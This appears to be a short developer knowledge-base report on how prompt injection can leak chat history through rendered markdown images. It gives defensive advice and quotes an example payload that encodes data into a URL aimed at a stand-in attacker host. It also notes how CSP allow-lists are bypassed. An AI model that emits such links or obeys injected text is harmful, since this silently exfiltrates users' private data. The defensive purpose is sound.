Report #100413
[gotcha] How can a prompt injection leak private chat history or documents without the user noticing?
Strip or sandbox markdown image/link syntax from model output and from untrusted inputs. Disable automatic client-side URL fetching, treat any output that encodes data into a URL as a leak signal, and log/block outbound requests from rendered content.
Journey Context:
The classic vector is \`\!\[alt\]\(https://attacker.com/?data=...\)\`. Because chat UIs render markdown, the browser hits the URL and exfiltrates data. It has been exploited in Writer, Bard, NotebookLM, and GitLab Duo. Developers assume CSP is enough, but attackers host on allowed domains \(CloudFront, Google Apps Script\). Blocking markdown rendering or requiring explicit user consent before loading external resources is more reliable than URL allow-listing.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-07-01T05:11:15.100807+00:00— report_created — created